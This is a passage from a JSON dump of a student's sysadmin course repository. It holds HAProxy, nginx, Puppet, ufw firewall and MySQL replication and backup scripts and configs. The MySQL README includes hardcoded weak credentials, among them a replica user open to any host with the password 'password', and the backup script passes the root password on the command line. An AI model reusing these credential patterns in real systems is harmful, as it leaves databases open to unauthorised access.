    "content": "#!/usr/bin/env bash\n# install load balancer\n\n# colors\nblue='\\e[1;34m'\nbrown='\\e[0;33m'\ngreen='\\e[1;32m'\nreset='\\033[0m'\n\necho -e \"${blue}Updating and doing some minor checks...${reset}\\n\"\n\nfunction install() {\n\tcommand -v \"$1\" &> /dev/null\n\n\t#shellcheck disable=SC2181\n\tif [ $? -ne 0 ]; then\n\t\techo -e \"\tInstalling: ${brown}$1${reset}\\n\"\n\t\tsudo apt-get update -y -qq && \\\n\t\t\tsudo apt-get install -y \"$1\" -qq\n\t\techo -e \"\\n\"\n\telse\n\t\techo -e \"\t${green}${1} is already installed.${reset}\\n\"\n\tfi\n}\n\ninstall haproxy #install haproxy\n\necho -e \"\\n${blue}Setting up some minor stuff.${reset}\\n\"\n\n# backup default server config file\nsudo cp /etc/haproxy/haproxy.cfg haproxy_default.backup\n\nserver_config=\\\n\"\ndefaults\n  mode http\n  timeout client 15s\n  timeout connect 10s\n  timeout server 15s\n  timeout http-request 10s\n\nfrontend th3gr00t-tech-frontend\n    bind *:80\n    default_backend th3gr00t-tech-backend\n\nbackend th3gr00t-tech-backend\n    balance roundrobin\n    server 453-web-01 35.243.128.200:80 check\n    server 453-web-02 3.239.120.96:80 check\n\"\n\n# shellcheck disable=SC2154\necho \"$server_config\" | sudo dd status=none of=/etc/haproxy/haproxy.cfg\n\n# enable haproxy to be started by init script\necho \"ENABLED=1\" | sudo dd status=none of=/etc/default/haproxy\n\nif [ \"$(pgrep -c haproxy)\" -le 0 ]; then\n\tsudo service haproxy start\nelse\n\tsudo service haproxy restart\nfi\n"
  },
  {
    "path": "0x0F-load_balancer/2-puppet_custom_http_response_header.pp",
    "content": "# Setup New Ubuntu server with nginx\n# and add a custom HTTP header\n\nexec { 'update system':\n        command => '/usr/bin/apt-get update',\n}\n\npackage { 'nginx':\n\tensure => 'installed',\n\trequire => Exec['update system']\n}\n\nfile {'/var/www/html/index.html':\n\tcontent => 'Hello World!'\n}\n\nexec {'redirect_me':\n\tcommand => 'sed -i \"24i\\\trewrite ^/redirect_me https://th3-gr00t.tk/ permanent;\" /etc/nginx/sites-available/default',\n\tprovider => 'shell'\n}\n\nexec {'HTTP header':\n\tcommand => 'sed -i \"25i\\\tadd_header X-Served-By \\$hostname;\" /etc/nginx/sites-available/default',\n\tprovider => 'shell'\n}\n\nservice {'nginx':\n\tensure => running,\n\trequire => Package['nginx']\n}\n"
  },
  {
    "path": "0x0F-load_balancer/README.md",
    "content": "# 0x0F. Load balancer\n\n<p align=\"center\">\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/275/qfdked8.png\"/>\n</p>\n\n## Resource\n\n<details>\n<summary>Load balancer</summary><br>\n<ul>\n  <li>Ever wonder how Facebook, Linkedin, Twitter and other web giants are handling such huge amounts of traffic? They don’t have just one server, but tens of thousands of them. In order to achieve this, web traffic needs to be distributed to these servers, and that is the role of a load-balancer.\n\n  <p align=\"center\">\n   <img src=\"https://s3.amazonaws.com/alx-intranet.hbtn.io/uploads/medias/2020/9/6cefdd14b2f8c36789cba132bd5a10d42d88a177.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIARDDGGGOUSBVO6H7D%2F20220111%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220111T181845Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=792a403303cb0d1faf98b4886f11e22013fa58b709f00d84029ac5877beb6aab\" />\n  </p>\n  <ul>\n      <li><a href=\"https://www.thegeekstuff.com/2016/01/load-balancer-intro/\">Load-balancing</a></li>\n      <li><a href=\"https://devcentral.f5.com/s/articles/intro-to-load-balancing-for-developers-ndash-the-algorithms\">Load-balancing algorithms</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary>Web stack debugging</summary><br>\n<ul>\n  <li>Intro\n  <ul>Debugging usually takes a big chunk of a software engineer’s time. The art of debugging is tough and it takes years, even decades to master, and that is why seasoned software engineers are the best at it… experience. They have seen lots of broken code, buggy systems, weird edge cases and race conditions.</ul>\n\n  <p align=\"center\">\n   <img src=\"https://s3.amazonaws.com/alx-intranet.hbtn.io/uploads/medias/2020/9/45dffb0b1da8dc2ce47e340d7f88b05652c0f486.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIARDDGGGOUSBVO6H7D%2F20220105%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220105T050302Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=d499fde872931932fc76dedd39b4298797482fd9b7ca1fc09f0a885ea8aa1cae\" />\n  </p>\n  </li>\n</ul>\n\n<details>\n<summary>Test and verify your assumptions</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/rFMtkCt8/image.png' border='0' alt='image'/></a>\n</details>\n\n<ul>\n  <li>Debugging is fun\n  <ul>Debugging can be frustrating, but it will definitely be part of your job, it requires experience and methodology to become good at it. The good news is that bugs are never going away, and the more experienced you become, trickier bugs will be assigned to you! Good luck 😃</ul>\n\n  <p align=\"center\">\n   <img src=\"https://s3.amazonaws.com/alx-intranet.hbtn.io/uploads/medias/2020/9/bae58c9f066a9668001ef4b4c39778407439d2f9.gif?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIARDDGGGOUSBVO6H7D%2F20220105%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220105T050302Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=67d4c1d736b92bef534ab94427ff3bef2c8ad4b498cafb512fbe6f6ddefec9ba\" />\n  </p>\n  </li>\n</ul>\n\n</details>\n\n- [Introduction to load-balancing and HAproxy](https://www.digitalocean.com/community/tutorials/an-introduction-to-haproxy-and-load-balancing-concepts)\n- [HAProxy Configuration Basics: Load Balance Your Servers](https://www.haproxy.com/blog/haproxy-configuration-basics-load-balance-your-servers/)\n- [The Four Essential Sections of an HAProxy Configuration](https://www.haproxy.com/blog/the-four-essential-sections-of-an-haproxy-configuration/)\n- [HTTP Header](https://www.techopedia.com/definition/27178/http-header)\n- [Debian/Ubuntu HAProxy packages](https://haproxy.debian.net/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-custom_http_response_header\">0. Double the number of webservers</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/prMGd5GF/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-install_load_balancer\">1. Install your load balancer</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/4dBWZ476/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-puppet_custom_http_response_header.pp\">2. Add a custom HTTP header with Puppet</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/sD2G5kZY/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x10-https_ssl/0-world_wide_web",
    "content": "#!/usr/bin/env bash\n# Displays informtation about subdomains.\n\n# uncomment for debugging purposes.\n#set -x\n\n# for the checker to work please remove the colors.\n\n# colors\nblue='\\e[1;34m'\nbrown='\\e[0;33m'\nreset='\\033[0m'\n\n# variables & parameters\nsubdomains=( \"www\" \"lb-01\" \"web-01\" \"web-02\" )\ndomain=\"$1\"\nsub=\"$2\"\n\ndig_cmd () {\n\t# func variables\n\tsub=\"$2\"\n\tINFO=\"$(dig \"$sub.$domain\" | grep -A1 'ANSWER SECTION:' | awk 'NR==2')\"\n\tIP=$(echo \"$INFO\" | awk '{print $5}')\n\tRECORD=$(echo \"$INFO\" | awk '{print $4}')\n\n\techo -e \"${brown}The subdomain ${blue}$sub${brown} is a ${blue}$RECORD${brown} record and points to ${blue}$IP${reset}\"\n}\n\nif [ $# -eq 1 ]; then\n\tfor subs in \"${subdomains[@]}\"; do\n\t\tdig_cmd \"$domain\" \"$subs\"\n\tdone\nelif [ $# -eq 2 ]; then\n\tdig_cmd \"$domain\" \"$sub\"\nfi\n"
  },
  {
    "path": "0x10-https_ssl/1-haproxy_ssl_termination",
    "content": "global\n        log /dev/log    local0\n\tstats socket /run/haproxy/admin.sock mode 660 level admin\n\ndefaults\n        log     global\n        mode    http\n        option  httplog\n\ttimeout connect  10s\n\ttimeout client  30s\n\ttimeout server  30s\n\nfrontend th3gr00t-tech-frontend\n\tbind *:80\n\tbind *:443 ssl crt /etc/haproxy/certs/th3gr00t.tech.pem\n\thttp-request redirect scheme https unless { ssl_fc }\n\thttp-request set-header X-Forwarded-Proto https\n\tdefault_backend th3gr00t-tech-backend\n\nbackend th3gr00t-tech-backend\n\tbalance roundrobin\n\tserver 453-web-01 35.243.128.200:80 check\n\tserver 453-web-02 3.239.120.96:80 check\n"
  },
  {
    "path": "0x10-https_ssl/100-redirect_http_to_https",
    "content": "global\n        log /dev/log    local0\n\tstats socket /run/haproxy/admin.sock mode 660 level admin\n\ndefaults\n        log     global\n        mode    http\n        option  httplog\n\ttimeout connect  10s\n\ttimeout client  30s\n\ttimeout server  30s\n\nfrontend th3gr00t-tech-frontend\n\tbind *:80\n\tbind *:443 ssl crt /etc/haproxy/certs/th3gr00t.tech.pem\n\thttp-request redirect scheme https code 301 unless { ssl_fc }\n\thttp-request set-header X-Forwarded-Proto https\n\tdefault_backend th3gr00t-tech-backend\n\nbackend th3gr00t-tech-backend\n\tbalance roundrobin\n\tserver 453-web-01 35.243.128.200:80 check\n\tserver 453-web-02 3.239.120.96:80 check\n"
  },
  {
    "path": "0x10-https_ssl/README.md",
    "content": "# 0x10. HTTPS SSL \n\n<p align=\"center\">\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/276/FlhGPEK.png\"/>\n</p>\n\n## Resource\n\n- [What is HTTPS?](https://www.instantssl.com/http-vs-https)\n- [What are the 2 main elements that SSL is providing](https://www.sslshopper.com/why-ssl-the-purpose-of-using-ssl-certificates.html)\n- [HAProxy SSL termination on Ubuntu16.04](https://devops.ionos.com/tutorials/install-and-configure-haproxy-load-balancer-on-ubuntu-1604/)\n- [SSL termination](https://en.wikipedia.org/wiki/TLS_termination_proxy)\n- [Bash function](https://tldp.org/LDP/abs/html/complexfunct.html)\n- [How to Secure HAProxy with Let's Encrypt on Ubuntu 14.04](https://www.digitalocean.com/community/tutorials/how-to-secure-haproxy-with-let-s-encrypt-on-ubuntu-14-04)\n- [HAProxy SSL Termination](https://www.haproxy.com/blog/haproxy-ssl-termination/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-world_wide_web\">0. World wide web</a></summary><br>\n<a href='https://postimg.cc/w3QxtHzN' target='_blank'><img src='https://i.postimg.cc/Y2Jvsqyd/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-haproxy_ssl_termination\">1. HAproxy SSL termination</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/jSy72SG2/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-redirect_http_to_https\">2. No loophole in your website traffic</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/Njtg78N1/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x11-what_happens_when_your_type_google_com_in_your_browser_and_press_enter/0-blog_post",
    "content": "https://gr00t.notion.site/What-Happens-846e145ce64f475f94f5a8bc713f171e\n"
  },
  {
    "path": "0x11-what_happens_when_your_type_google_com_in_your_browser_and_press_enter/1-what_happen_when_diagram",
    "content": "https://gr00t.notion.site/What-Happens-846e145ce64f475f94f5a8bc713f171e\n"
  },
  {
    "path": "0x11-what_happens_when_your_type_google_com_in_your_browser_and_press_enter/README.md",
    "content": "# 0x11. What happens when you type holbertonschool.com in your browser and press Enter \n\n<p align=\"center\">\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/298/aJPw3mw.jpg\" />\n</p>\n\n<details>\n<summary>Background Context</summary>\n\n- Being a Full-Stack Software Engineer means you’re comfortable interacting with any layer of the stack.\n- A way to easily assess this is to simply ask an engineer to explain how a software system works. They can have a general overview of the flow or can choose to dig deep in a certain area.\n- Let’s practice by exploring the infrastructure side (network, servers, security…) of the question.\n\n</details>\n\n<details>\n<summary><a href=\"./0-blog_post\">0. What happens when...</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/13hCTtVn/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-what_happen_when_diagram\">1. Everything's better with a pretty diagram</a></summary><br>\n\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/52jxys2W/image.png' border='0' alt='image'/></a>\n\n<img src=\"https://i.imgur.com/i9ivkdo.png\" />\n<img src=\"https://i.imgur.com/R8R3sqC.png\" />\n\n</details>\n"
  },
  {
    "path": "0x12-web_stack_debugging_2/0-iamsomeoneelse",
    "content": "#!/usr/bin/env bash\n# Runs whoami command under the user passed as an argument\nsu \"$1\" -s /bin/bash -c 'whoami'\n"
  },
  {
    "path": "0x12-web_stack_debugging_2/1-run_nginx_as_nginx",
    "content": "#!/usr/bin/env bash\n# Fixes the issue with the server\nchmod 644 /etc/nginx/nginx.conf\nsed -Ei 's/\\s*#?\\s*user .*/user nginx;/' /etc/nginx/nginx.conf\nsed -Ei 's/(listen (\\[::\\]:)?80) /\\180 /' /etc/nginx/sites-enabled/default\npkill apache2\nsu nginx -s /bin/bash -c 'service nginx restart'\n"
  },
  {
    "path": "0x12-web_stack_debugging_2/100-fix_in_7_lines_or_less",
    "content": "#!/usr/bin/env bash\n# Fixes the issue with the server\nchmod 644 /etc/nginx/nginx.conf\nsed -Ei 's/\\s*#?\\s*user .*/user nginx;/' /etc/nginx/nginx.conf\nsed -Ei 's/(listen (\\[::\\]:)?80) /\\180 /' /etc/nginx/sites-enabled/default\npkill apache2\nsu nginx -s /bin/bash -c 'service nginx restart'\n"
  },
  {
    "path": "0x12-web_stack_debugging_2/README.md",
    "content": "# 0x12. Web stack debugging #2 \n\n<p align=\"center\">\n  <img src=\"https://i.postimg.cc/dVXBzkzc/99littlebugsinthecode.jpg\"/>\n</p>\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-iamsomeoneelse\">0. Run software as another user</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/3JjzLYwh/power.png' border='0' alt='power'/></a>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/cHZT1qTs/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-run_nginx_as_nginx\">1. Run Nginx as Nginx</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/HnNDJ0Ss/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-fix_in_7_lines_or_less\">2. 7 lines or less</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/pd9mQ0Jw/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x13-firewall/0-block_all_incoming_traffic_but",
    "content": "sudo apt-get install ufw -y\nsudo ufw default deny incoming\nsudo ufw default allow outgoing\nsudo ufw allow 22/tcp\nsudo ufw allow 443/tcp\nsudo ufw allow 80/tcp\nsudo ufw enable -y\nsudo ufw status\n"
  },
  {
    "path": "0x13-firewall/100-port_forwarding",
    "content": "#\n# /etc/ufw/before.rules\n#\n# rules.before\n#\n# Rules that should be run before the ufw command line added rules. Custom\n# rules should be added to one of these chains:\n#   ufw-before-input\n#   ufw-before-output\n#   ufw-before-forward\n#\n\n# Don't delete these required lines, otherwise there will be errors\n*filter\n:ufw-before-input - [0:0]\n:ufw-before-output - [0:0]\n:ufw-before-forward - [0:0]\n:ufw-not-local - [0:0]\n# End required lines\n\n# Allow port forwarding from port 8080/TCP to port 80/TCP\n*nat\n:PREROUTING ACCEPT [0:0]\n-A PREROUTING -p tcp --dport 8080 -j REDIRECT --to-port 80\nCOMMIT\n\n\n# allow all on loopback\n-A ufw-before-input -i lo -j ACCEPT\n-A ufw-before-output -o lo -j ACCEPT\n\n# quickly process packets for which we already have a connection\n-A ufw-before-input -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A ufw-before-output -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A ufw-before-forward -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n\n# drop INVALID packets (logs these in loglevel medium and higher)\n-A ufw-before-input -m conntrack --ctstate INVALID -j ufw-logging-deny\n-A ufw-before-input -m conntrack --ctstate INVALID -j DROP\n\n# ok icmp codes for INPUT\n-A ufw-before-input -p icmp --icmp-type destination-unreachable -j ACCEPT\n-A ufw-before-input -p icmp --icmp-type time-exceeded -j ACCEPT\n-A ufw-before-input -p icmp --icmp-type parameter-problem -j ACCEPT\n-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT\n\n# ok icmp code for FORWARD\n-A ufw-before-forward -p icmp --icmp-type destination-unreachable -j ACCEPT\n-A ufw-before-forward -p icmp --icmp-type time-exceeded -j ACCEPT\n-A ufw-before-forward -p icmp --icmp-type parameter-problem -j ACCEPT\n-A ufw-before-forward -p icmp --icmp-type echo-request -j ACCEPT\n\n# allow dhcp client to work\n-A ufw-before-input -p udp --sport 67 --dport 68 -j ACCEPT\n\n#\n# ufw-not-local\n#\n-A ufw-before-input -j ufw-not-local\n\n# if LOCAL, RETURN\n-A ufw-not-local -m addrtype --dst-type LOCAL -j RETURN\n\n# if MULTICAST, RETURN\n-A ufw-not-local -m addrtype --dst-type MULTICAST -j RETURN\n\n# if BROADCAST, RETURN\n-A ufw-not-local -m addrtype --dst-type BROADCAST -j RETURN\n\n# all other non-local packets are dropped\n-A ufw-not-local -m limit --limit 3/min --limit-burst 10 -j ufw-logging-deny\n-A ufw-not-local -j DROP\n\n# allow MULTICAST mDNS for service discovery (be sure the MULTICAST line above\n# is uncommented)\n-A ufw-before-input -p udp -d 224.0.0.251 --dport 5353 -j ACCEPT\n\n# allow MULTICAST UPnP for service discovery (be sure the MULTICAST line above\n# is uncommented)\n-A ufw-before-input -p udp -d 239.255.255.250 --dport 1900 -j ACCEPT\n\n# don't delete the 'COMMIT' line or these rules won't be processed\nCOMMIT\n"
  },
  {
    "path": "0x13-firewall/README.md",
    "content": "# 0x13. Firewall \n\n<p align=\"center\" />\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/284/V1HjQ1Y.png\" />\n</p>\n\n### Your servers without a firewall...\n\n<p align=\"center\" />\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/155/holbertonschool-firewall.gif\" />\n</p>\n\n\n## Resource\n\n- [What is a firewall](https://en.wikipedia.org/wiki/Firewall_%28computing%29) \n- [Port forwarding with iptables](https://www.cogini.com/blog/port-forwarding-with-iptables/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-block_all_incoming_traffic_but\">0. Block all incoming traffic but</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/qq0ZGZVq/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-port_forwarding\">1. Port forwarding</a></summary><br>\n\nFirewalls can not only filter requests, they can also forward them.\n\nRequirements:\n\n\t- Configure web-01 so that its firewall redirects port `8080/TCP` to port `80/TCP`.\n\t- Your answer file should be a copy of the `ufw` configuration file that you modified to make this happen\nTerminal in `web-01`:\n\n```sh\nroot@03-web-01:~# netstat -lpn\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name\ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      2473/nginx\ntcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      978/sshd\ntcp6       0      0 :::80                   :::*                    LISTEN      2473/nginx\ntcp6       0      0 :::22                   :::*                    LISTEN      978/sshd\nudp        0      0 0.0.0.0:68              0.0.0.0:*                           594/dhclient\nudp        0      0 0.0.0.0:54432           0.0.0.0:*                           594/dhclient\nudp6       0      0 :::32563                :::*                                594/dhclient\nActive UNIX domain sockets (only servers)\nProto RefCnt Flags       Type       State         I-Node   PID/Program name    Path\nunix  2      [ ACC ]     SEQPACKET  LISTENING     7175     433/systemd-udevd   /run/udev/control\nunix  2      [ ACC ]     STREAM     LISTENING     6505     1/init              @/com/ubuntu/upstart\nunix  2      [ ACC ]     STREAM     LISTENING     8048     741/dbus-daemon     /var/run/dbus/system_bus_socket\nunix  2      [ ACC ]     STREAM     LISTENING     8419     987/acpid           /var/run/acpid.socket\nroot@03-web-01:~#\nroot@03-web-01:~# grep listen /etc/nginx/sites-enabled/default\n    listen 80 default_server;\n    listen [::]:80 default_server ipv6only=on;\n    # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000\n#   listen 8000;\n#   listen somename:8080;\n#   listen 443;\nroot@03-web-01:~#\n```\n\n- My web server `nginx` is only listening on port `80`\n- `netstat` shows that nothing is listening on `8080`\nTerminal in `web-02`:\n\n```sh\nubuntu@03-web-02:~$ curl -sI web-01.holberton.online:80\nHTTP/1.1 200 OK\nServer: nginx/1.4.6 (Ubuntu)\nDate: Tue, 07 Mar 2017 02:14:41 GMT\nContent-Type: text/html\nContent-Length: 612\nLast-Modified: Tue, 04 Mar 2014 11:46:45 GMT\nConnection: keep-alive\nETag: \"5315bd25-264\"\nAccept-Ranges: bytes\n\nubuntu@03-web-02:~$ curl -sI web-01.holberton.online:8080\nHTTP/1.1 200 OK\nServer: nginx/1.4.6 (Ubuntu)\nDate: Tue, 07 Mar 2017 02:14:43 GMT\nContent-Type: text/html\nContent-Length: 612\nLast-Modified: Tue, 04 Mar 2014 11:46:45 GMT\nConnection: keep-alive\nETag: \"5315bd25-264\"\nAccept-Ranges: bytes\n\nubuntu@03-web-02:~$\n```\nI use curl to query `web-01.holberton.online`, and since my firewall is forwarding the ports, I get a `HTTP 200` response on port `80/TCP` and also on port `8080/TCP`.\n\n</details>\n"
  },
  {
    "path": "0x14-mysql/4-mysql_configuration_primary",
    "content": "#\n# The MySQL  Server configuration file.\n#\n\n[mysqld]\npid-file        = /var/run/mysqld/mysqld.pid\nsocket          = /var/run/mysqld/mysqld.sock\ndatadir         = /var/lib/mysql\nlog-error       = /var/log/mysql/error.log\n# By default we only accept connections from localhost\nbind-address    = 0.0.0.0\n# Disabling symbolic-links is recommended to prevent assorted security risks\nsymbolic-links=0\n# Distinguish servers in a replication setup\nserver-id       = 1\n# MySQL's Binary Log File\nlog_bin         = /var/log/mysql/mysql-bin.log\n# Database we want to replicate\nbinlog_do_db    = tyrell_corp\n"
  },
  {
    "path": "0x14-mysql/4-mysql_configuration_replica",
    "content": "#\n# The MySQL  Server configuration file.\n#\n\n[mysqld]\npid-file        = /var/run/mysqld/mysqld.pid\nsocket          = /var/run/mysqld/mysqld.sock\ndatadir         = /var/lib/mysql\nlog-error       = /var/log/mysql/error.log\n# By default we only accept connections from localhost\nbind-address    = 127.0.0.1\n# Disabling symbolic-links is recommended to prevent assorted security risks\nsymbolic-links=0\n# Distinguish servers in a replication setup\nserver-id       = 2\n# MySQL's Binary Log File\nlog_bin         = /var/log/mysql/mysql-bin.log\n# Database we want to replicate\nbinlog_do_db    = tyrell_corp\n# Defines the location of the replica's relay log\nrelay-log       = /var/log/mysql/mysql-relay-bin.log\n"
  },
  {
    "path": "0x14-mysql/5-mysql_backup",
    "content": "#!/usr/bin/env bash\n# backup and compress my databases\n\n# variables\nday=$(date +\"%d\")\nmonth=$(date +\"%m\")\nyear=$(date +\"%Y\")\nfile_name=\"$day-$month-$year.tar.gz\"\n\nmysqldump --all-databases -u root --password=\"$1\" > backup.sql\ntar -czvf \"$file_name\" backup.sql\n"
  },
  {
    "path": "0x14-mysql/README.md",
    "content": "# 0x14. MySQL \n\n<p align=\"center\">\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/280/KkrkDHT.png\"\n</p>\n\n## Resource\n\n- [What is a database](https://searchdatamanagement.techtarget.com/definition/database)\n- [What is a database primary/replicate cluster](https://www.digitalocean.com/community/tutorials/how-to-choose-a-redundancy-plan-to-ensure-high-availability#sql-replication)\n- [MySQL primary/replicate setup](https://www.digitalocean.com/community/tutorials/how-to-set-up-replication-in-mysql)\n- [Build a robust database backup strategy](https://www.databasejournal.com/ms-sql/developing-a-sql-server-backup-strategy/)\n- [Privileges Provided by MySQL](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_replication-client) (***Replication Client***)\n- [Creating User for Replication](https://dev.mysql.com/doc/refman/8.0/en/replication-howto-repuser.html)\n- [Setting up replicas](https://dev.mysql.com/doc/refman/5.7/en/replication-setup-replicas.html) (***MySQL 5.7.x***)\n\n## Tasks\n\n<details>\n<summary>0. Install MySQL</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/wMPwtg5K/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary>1. Let us in!</summary><br>\n\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/zB1QFncd/image.png' border='0' alt='image'/></a>\n```sh\nmysql> CREATE USER 'holberton_user'@'localhost' IDENTIFIED BY 'projectcorrection280hbtn';\nmysql> GRANT REPLICATION CLIENT ON *.* to 'holberton_user'@'localhost';\nmysql> FLUSH PRIVILEGES;\n```\n\n</details>\n\n<details>\n<summary>2. If only you could see what I've seen with your eyes</summary><br>\n\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/sgDm766T/image.png' border='0' alt='image'/></a>\n```sh\nmysql> CREATE DATABASE tyrell_corp;\nmysql> USE tyrell_corp;\nmysql> CREATE TABLE nexus6 (id INT, name VARCHAR(256));\nmysql> INSERT INTO nexus6 (id, name) VALUES ('1', 'Leon');\nmysql> GRANT SELECT ON tyrell_corp.nexus6 TO 'holberton_user'@'localhost';\n```\n\n</details>\n\n<details>\n<summary>3. Quite an experience to live in fear, isn't it?</summary><br>\n\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/D0CmW3vT/image.png' border='0' alt='image'/></a>\n```sh\nmsql> CREATE USER 'replica_user'@'%' IDENTIFIED BY 'password';\nmysql> GRANT SELECT ON mysql.user TO 'holberton_user'@'localhost';\nmysql> GRANT REPLICATION SLAVE ON *.* TO 'replica_user'@'%';\n```\n\n</details>\n\n<details>\n<summary>4. Setup a Primary-Replica infrastructure using MySQL</summary><br>\n\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/MKBBLGVn/09e83e914f0d6865ce320a47f2f14837a5b190b6.gif' border='0' alt='09e83e914f0d6865ce320a47f2f14837a5b190b6'/></a>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/9fkyDg7k/image.png' border='0' alt='image'/></a>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/Jhhb4DpP/image.png' border='0' alt='image'/></a>\n<a href='https://postimg.cc/4nLx8dpx' target='_blank'><img src='https://i.postimg.cc/28mLSL6h/image.png' border='0' alt='image'/></a>\n\n+ [MySQL primary configuration](./4-mysql_configuration_primary)\n+ [MySQL replica configuration](./4-mysql_configuration_replica)\n\n</details>\n\n<details>\n<summary>5. MySQL backup</summary><br>\n\n[![IMAGE ALT TEXT HERE](https://i.postimg.cc/3NtKg0gR/verizon.jpg)](https://www.youtube.com/watch?v=ANU-oSE5_hU)\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/J7YV5LfG/image.png' border='0' alt='image'/></a>\n\n```sh\nubuntu@03-web-01:~$ ls\n5-mysql_backup\nubuntu@03-web-01:~$ ./5-mysql_backup mydummypassword\nbackup.sql\nubuntu@03-web-01:~$ ls\n01-03-2017.tar.gz  5-mysql_backup  backup.sql\nubuntu@03-web-01:~$ more backup.sql\n-- MySQL dump 10.13  Distrib 5.7.25, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost    Database:\n-- ------------------------------------------------------\n-- Server version   5.7.25-0ubuntu0.14.04.1\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8 */;\n/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;\n/*!40103 SET TIME_ZONE='+00:00' */;\n/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;\n/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;\n/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;\n/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;\n\n--\n-- Current Database: `tyrell_corp`\n--\n\nCREATE DATABASE /*!32312 IF NOT EXISTS*/ `tyrell_corp` /*!40100 DEFAULT CHARACTER SET latin1 */;\n\nUSE `tyrell_corp`;\n\n--\n-- Table structure for table `nexus6`\n--\n\nDROP TABLE IF EXISTS `nexus6`;\n/*!40101 SET @saved_cs_client     = @@character_set_client */;\n/*!40101 SET character_set_client = utf8 */;\nCREATE TABLE `nexus6` (\n  `id` int(6) unsigned NOT NULL AUTO_INCREMENT,\n  `firstname` varchar(30) NOT NULL,\n  `lastname` varchar(30) NOT NULL,\n  `email` 